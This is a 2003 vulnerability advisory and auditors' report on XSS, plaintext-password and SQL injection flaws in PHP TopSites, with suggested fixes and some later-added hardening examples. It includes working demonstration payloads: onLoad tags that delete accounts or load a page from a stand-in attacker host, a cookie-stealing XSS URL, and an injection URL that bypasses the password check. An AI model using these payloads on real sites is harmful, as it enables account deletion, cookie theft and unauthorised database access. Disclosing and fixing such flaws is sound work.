SecurityTracker.com

SecurityTracker Archives

Category:   Application (Generic)  >   PHP TopSites
Vendors:   iTop10.Net
PHP TopSites Input Validation Flaws Let Remote Users Access the Database and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005921
SecurityTracker URL:  http://securitytracker.com/id/1005921
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 15 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0 beta and prior versions
Description:   The CyberArmy Application and Code Auditing Team reported several input validation vulnerabilities in PHP TopSites. A remote user can execute SQL commands on the underlying database. A remote user can also conduct cross-site scripting attacks against site users and administrators.

It is reported that the 'add.php' script does not properly filter user-supplied HTML. A remote user can invoke this script to add a site and include specially crafted HTML-based scripting code in the description field. Then, when an administrator views the page containing the description, the code will be executed by the administrator's browser. The code will be able to take actions on the site acting as the target administrator, such as deleting or modifying user accounts.

A demonstration exploit (as content for the description field) that causes the account with the specified 'sid' to be deleted is provided:

<body onLoad="parent.location='http://[target]/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">

It is also reported that the 'help.php' script does not filter user-supplied HTML. A remote user can invoke this script with a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running PHP TopSites and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies belonging to other applications), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>

It is also reported that remote authenticated users with access to the admin panel or edit.php page can view user passwords.

It is also reported that in certain versions (1.x), a remote user can inject SQL statements to be executed on the underlying MySQL database. This is due to the lack of quoting of numeric data in the SQL statement and the 'register_globals' configuration in 'php.ini', according to the report. A remote user can view user account details, edit site details, and view passwords.

A demonstration exploit URL is provided:

http://[target]/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber

The vendor has reportedly been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running PHP TopSites, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute commands on the underlying MySQL database (for version 1.x of PHP TopSites) to view user account data, edit TopSite entries, and view passwords.

Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial fix for at least some of the flaws. The fix is described in the Source Message.

Vendor URL:  www.itop10.net/products/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  Vulnerability Report

CASR - ACAT
PHP TopSites Vulnerability Report
01/13/03


The purpose of this document is to show several vulnerabilities and provide fixes for the PHP TopSites Pro/Free script. This report is published for educational purposes only. The authors take no responsibility for damage resulting from the misuse of this information. All copyrights are retained by the authors. This information may not be reproduced without prior written consent from the authors.

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: easy configuration config file; MySQL database backend; unlimited categories; site rating on incoming votes; special rating from webmaster; anti-cheating gateway; random link; lost password function; webmaster site approval; edit site; ProcessingTime display; cookies anti-cheating; site reviews; Linux cron free; frame protection and much more.
http://www.itop10.net/products/

The ACAT Team estimates that there are over 3000 websites that utilize PHP TopSites scripts and that 95% of those websites are vulnerable to at least one of the following vulnerabilities. Even after several attempts by the ACAT Team to contact the developer, the company still refuses to acknowledge any of these vulnerabilities.


Vulnerability 1.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: add.php

Because PHP TopSites does not have session authentication, it allows an attacker to use an XSS vulnerability to do things like delete, edit, and change user accounts by having an unknowing admin run the code. By putting the following in the description field when adding a new website to any particular topsite, it is almost impossible for any admin not to run the code (unless they have customized browser security settings). The code is executed when the admin loads the page. He has to do nothing but load the page in order to validate a site, and the integrity of the database can be destroyed, because the code is never parsed out of the field and the page does not display it; it executes it. Below are a few examples, placed into the description field when adding a new site.

<body onLoad="parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">
This code will effectively delete the user account with the given site id number as soon as the admin loads the page.

<body onLoad="window.open('http://attackerswebsite/launcher.htm')">
Using this code, an attacker can open a popup window to a page on his site that contains code for several more popup windows. Each window can be used to delete a site from the PHP TopSites database. This method can totally erase a TopSites database as soon as the admin loads the page.

To fix this vulnerability open add.php and find:

if (!$name) { $err.= "Please enter your name.<BR>"; }
if (!$passw) { $err.= "Please enter password.<BR>"; }
if (!$email) { $err.= "Please enter your email address.<BR>"; }
if (!$title) { $err.= "Please enter site title.<BR>"; }
if (!$url) { $err.= "Please enter site url.<BR>"; }
if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }
if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }
if (!$description) { $err.= "Please enter site description.<BR>"; }
if (!$category) { $err.= "Please enter site category.<BR>"; }
if (check_email_addr($email) == 0) { $err.= "Please enter valid email address.<BR>"; }

Below it paste:

////////////////////////////////////////////////////////////////////////////////////////////////////
// Critical XSS Vuln Fix By JeiAr (jeiar@kmfms.com) January 12 2003 - All versions PHP Topsites //
////////////////////////////////////////////////////////////////////////////////////////////////////
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter a valid Name.<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter a valid Password<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter a valid Title<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter a valid Linkback<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter a valid URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter a valid Banner URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter a valid Banner Width<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter a valid Banner Height<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please enter a valid Description<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter a valid Category<BR>";}
////////////////////////////////////////////////////////////////////////////////////////////////////



Vulnerability 2.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: help.php

Because PHP TopSites does not have session authentication, it allows an attacker to use an XSS vulnerability to steal cookies or other user-supplied information. The page being generated with unvalidated input from untrustworthy sources causes this vulnerability. The developer is urged to implement session authentication into this script. The following example lies in the help.php file.

http://somewebsitesite/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
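Both XSS findings above (the add.php description field and the help.php sid parameter) share one root cause: untrusted input is written back into HTML unencoded. The ereg() checks in the fix are anchored with `$`, so they only reject a value whose last character is in the set; encoding at output time protects the admin page whatever was stored. The following is an added example, not PHP TopSites code; html_out, parse_sid, render_site_row and help_page are hypothetical helper names.

```php
<?php
// Added example, not PHP TopSites code. Function names are hypothetical;
// $description stands for the add.php field, $sid for help.php's parameter.

/** Encode an untrusted value for an HTML text or attribute context. */
function html_out(string $value): string
{
    // ENT_QUOTES escapes ' as well as ", so the result is also safe inside
    // a quoted attribute; ENT_SUBSTITUTE avoids returning '' on bad UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** A site id is a positive integer; anything else is rejected outright. */
function parse_sid(string $raw): ?int
{
    return (ctype_digit($raw) && $raw !== '0') ? (int) $raw : null;
}

/** One row of the admin approval list; title and description are untrusted. */
function render_site_row(int $sid, string $title, string $description): string
{
    return '<tr><td>' . $sid . '</td><td>' . html_out($title) . '</td>'
         . '<td>' . html_out($description) . '</td></tr>';
}

/** help.php: validate sid before using it anywhere, then emit only the int. */
function help_page(array $get): string
{
    $sid = parse_sid($get['sid'] ?? '');
    if ($sid === null) {
        http_response_code(400);
        return 'Invalid site id.';
    }
    // $sid is now an int, so echoing it cannot introduce markup.
    return '<p>Help for site ' . $sid . '</p>';
}

// Constructed sample: the description-field payload from Vulnerability 1.
$payload = '<body onLoad="parent.location=\'http://example.invalid/seditor.php?sid=12&a=delete\'">';
echo render_site_row(12, 'Example site', $payload), PHP_EOL;
// The tag reaches the admin's browser as text (&lt;body onLoad=&quot;...) and never runs.

// Constructed sample: the help.php request from Vulnerability 2.
echo help_page(['sid' => '<script>alert(document.cookie)</script>']), PHP_EOL;
echo help_page(['sid' => '12']), PHP_EOL;
```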


Vulnerability 3.

Plaintext Password Disclosure Vulnerability in all versions of PHP TopSites

Version: All
Script: edit.php and admin scripts

No current versions of PHP TopSites encrypt user passwords, and these plaintext passwords can be viewed by anyone with access to the admin panel or edit.php page. Any Topsite admin (or intruder) can possibly use the user-supplied password to try and compromise the security of the user-supplied website and/or the user-supplied email account. So anyone signing up for a TopList using PHP TopSites should keep this in mind, and it should also be noted to anyone using the same password for everything that this is generally not a very good habit to have. This vulnerability affects all versions. A suggestion to the developer would be to hash the passwords via the md5 function, and not allow the password to be displayed to an admin when editing TopList user(s).


Vulnerability 4.

PHP TopSites User Account Compromise Vulnerability in All Pro versions and in 1.xx Free versions

Version: All Pro Versions and Free Versions 1.xx
Script: edit.php

This is exploitable because of two conditions in the PHP/MySQL configuration. Firstly, the register_globals parameter is on in php.ini, which automatically turns every request parameter into a global variable. Secondly, the underlying database is MySQL, which does not require numeric criteria in the SQL statement to be quoted. This allows an attacker to bypass the magic_quotes_gpc protection in PHP by manipulating numeric parts of a query.

It is possible for an attacker to use SQL injection to expose all user account details for any user he or she knows the id number of. All site ID numbers of a particular Top List are made available on the index.php page. The vulnerable code resides in edit.php. Examples are listed below.

http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber--
This injection negates the use of a password and provides access to the TopList edit page. All information about a particular site can be viewed and edited from this page. One thing to note: the password is displayed as plaintext on this page also.

All users of the 1.XX Free script(s) are urged to upgrade their scripts as soon as possible. If you are not able to upgrade, the below code should serve as a quick fix.

In the edit.php file change:
$query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid AND password='$passw'",$db) or die (mysql_error());
$num_rows = mysql_num_rows($query);
to:
$query = mysql_db_query ($dbname,"Select * from top_user Where sid='$sid' AND password='$passw'",$db) or die (mysql_error());
$num_rows = mysql_num_rows($query);
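The quick fix above quotes $sid so that magic_quotes_gpc escaping applies to it; the following added example (not the project's own code) instead keeps the value out of the SQL text entirely and also stores the password as a hash, covering Vulnerability 3 as well. It assumes a mysqli connection in $db (mysqli replaces the removed mysql_db_query()), a top_user.password column holding password_hash() output instead of plaintext, and hypothetical function names find_site_for_edit and store_password; password_hash() is used rather than the md5 suggested earlier because md5 is unsalted and fast to brute-force.

```php
<?php
// Added example, not PHP TopSites code: a hardened replacement for the
// edit.php lookup. Assumes a mysqli connection in $db and that
// top_user.password holds password_hash() output. Names are hypothetical.

/** Look up the site a user wants to edit; null means "no access". */
function find_site_for_edit(mysqli $db, string $rawSid, string $passw): ?array
{
    // Do not rely on register_globals: the caller passes $_POST values in.
    // A site id must be a positive integer, so 'siteidnumber--' stops here.
    if (!ctype_digit($rawSid) || $rawSid === '0') {
        return null;
    }
    $sid = (int) $rawSid;

    // The id is bound as a parameter, never spliced into the SQL string, so
    // quoting (or the lack of it) around a numeric column no longer matters.
    $stmt = $db->prepare('SELECT * FROM top_user WHERE sid = ?');
    $stmt->bind_param('i', $sid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // The password is checked against a salted hash in PHP, not compared as
    // plaintext inside the query, so no password ever appears in the SQL.
    if (!$row || !password_verify($passw, $row['password'])) {
        return null;
    }
    unset($row['password']);   // the edit page must never echo the credential
    return $row;
}

/** Sign-up or password change: store a hash, not the plaintext the report found. */
function store_password(mysqli $db, int $sid, string $passw): void
{
    $hash = password_hash($passw, PASSWORD_DEFAULT);   // salted and slow, unlike md5
    $stmt = $db->prepare('UPDATE top_user SET password = ? WHERE sid = ?');
    $stmt->bind_param('si', $hash, $sid);
    $stmt->execute();
    $stmt->close();
}

// Caller in edit.php (values read explicitly from the form, not from globals):
// $site = find_site_for_edit($db, $_POST['sid'] ?? '', $_POST['passw'] ?? '');
// if ($site === null) { die('Wrong site id or password.'); }
```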


In conclusion, the vulnerabilities in this script make it very easy for an attacker to exploit. The vulnerabilities present in this script compromise the security of user accounts, the integrity of the data in the database, and the security of the server it is hosted on. All administrators that are currently using this script in their websites are strongly urged to patch or upgrade the PHP TopSites script. Some versions, such as the Pro version, have no developer upgrades or patches available at the time of this writing, so they are still vulnerable to the attacks mentioned above.

All credits go to the CyberArmy Application and Code Auditing Team:

JeiAr
Paragod
Virtex
Ravpup
Praxxis
Mortal
Genome

